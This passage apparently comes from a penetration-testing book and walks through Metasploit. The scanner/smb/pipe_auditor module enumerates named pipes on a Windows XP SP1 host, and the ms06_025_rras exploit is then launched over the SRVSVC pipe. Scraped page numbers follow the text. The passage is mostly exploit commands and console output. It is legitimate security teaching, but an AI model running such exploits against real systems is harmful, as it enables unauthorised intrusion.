Looks like Metasploit
3 also knows how to play with wireless drivers??¦ Interesting... But for now, let??™s keep
focused on our XP SP1 RRAS exploit by enumerating the exposed named pipes.
NOTE Chapter 16 talks more about named pipes, including elevation of
privilege attack techniques abusing weak access control on named pipes.
msf exploit(ms06_025_rras) > use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR
identifier
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.1.220
RHOSTS => 192.168.1.220
msf auxiliary(pipe_auditor) > exploit
[*] Pipes: \netlogon, \lsarpc, \samr, \epmapper, \srvsvc, \wkssvc
[*] Auxiliary module execution completed
The exploit description turns out to be correct. The ROUTER named pipe either does
not exist on XP SP1 or is not exposed anonymously. \srvsvc is in the list, however, so
we??™ll instead target the RRAS RPC interface over the \srvsvc named pipe.
msf auxiliary(pipe_auditor) > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[*] Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.
Pages:
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215